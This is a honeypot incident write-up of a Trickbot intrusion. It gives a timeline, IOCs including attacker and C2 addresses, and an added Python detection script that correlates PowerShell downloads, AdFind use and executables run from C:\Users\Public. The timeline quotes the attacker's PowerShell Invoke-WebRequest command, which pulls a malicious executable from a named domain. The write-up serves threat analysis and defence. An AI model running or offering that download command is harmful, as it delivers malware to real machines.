An attacker logged into the honeypot, dropped AdFind, a couple of batch files and Trickbot. The attacker created a user, ran a reconnaissance script that used AdFind, and then installed Trickbot.
This is what the folder structure looked like.

Timeline
Time in UTC
22:13 – login from 216.170.123[.]19
22:15 – opens powershell and runs the following command to download enter.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest http://support-it.online/upl/data/enter.exe -OutFile c:\users\public\enter.exe
22:17 – ran test_32.exe
22:18 – ran adduser.bat

22:18 – ran enter.exe
22:19 – ran adf.bat

22:22 – socks.exe is run which drops Trickbot
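As an added defender-side example (not part of the original post or its data), the following Python correlates process-creation events modelled on this timeline: a PowerShell download into a user-writable path followed by execution of that same file, any AdFind execution, and binaries launched from C:\Users\Public. The log lines and date are constructed; the log format, regexes and the 30-minute execution window are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed Sysmon-style process-creation log (date is a placeholder; the times and
# commands mirror the honeypot timeline). Not taken from the original page's data set.
SAMPLE_LOG = """\
2020-01-01 22:15:10 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe CommandLine=powershell.exe Invoke-WebRequest http://support-it.online/upl/data/enter.exe -OutFile c:\\users\\public\\enter.exe
2020-01-01 22:17:02 Image=C:\\Users\\Public\\test_32.exe CommandLine=test_32.exe
2020-01-01 22:18:05 Image=C:\\Windows\\System32\\cmd.exe CommandLine=cmd.exe /c adduser.bat
2020-01-01 22:18:40 Image=C:\\Users\\Public\\enter.exe CommandLine=enter.exe
2020-01-01 22:19:12 Image=C:\\Users\\Public\\AdFind.exe CommandLine=AdFind.exe
2020-01-01 22:22:30 Image=C:\\Users\\Public\\socks.exe CommandLine=socks.exe
"""

LINE_RE = re.compile(r"^(\S+ \S+) Image=(\S+) CommandLine=(.*)$")
# PowerShell download cmdlets/methods followed by an -OutFile destination (assumed pattern)
DOWNLOAD_RE = re.compile(r"(invoke-webrequest|iwr|downloadfile).*?-outfile\s+(\S+)", re.I)
EXEC_WINDOW = timedelta(minutes=30)  # assumed window between download and execution


def parse(log):
    """Yield (timestamp, image, commandline) tuples from the log text."""
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S"), m.group(2), m.group(3)


def detect(log):
    """Return a list of (time, rule, detail) findings, in log order."""
    findings, pending = [], {}  # pending: lower-cased download path -> download time
    for ts, image, cmd in parse(log):
        img = image.lower()
        if img.endswith("powershell.exe"):
            d = DOWNLOAD_RE.search(cmd)
            if d:
                dest = d.group(2).lower()
                pending[dest] = ts
                findings.append((ts, "powershell_download", dest))
        # Stateful rule: the file PowerShell just wrote is executed shortly afterwards
        if img in pending and ts - pending[img] <= EXEC_WINDOW:
            findings.append((ts, "download_then_execute", img))
        if img.endswith("\\adfind.exe"):
            findings.append((ts, "adfind_recon", img))
        if img.startswith("c:\\users\\public\\"):
            findings.append((ts, "exec_from_public", img))
    return findings


if __name__ == "__main__":
    for ts, rule, detail in detect(SAMPLE_LOG):
        print(ts.strftime("%H:%M"), rule, detail)
```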

Trickbot
This is a sandbox run of enter.exe, which eventually leads to Trickbot.


Trickbot checking to see if the IP is blacklisted.

IOCs
All executables and scripts can be found in MISP
MISP Priv 65043
MISP circl osint feed UUID 5e4b486e-9968-4af1-87dc-4ff4950d210f
C2 195.133.145.31 443/tcp
All script commands – pastebin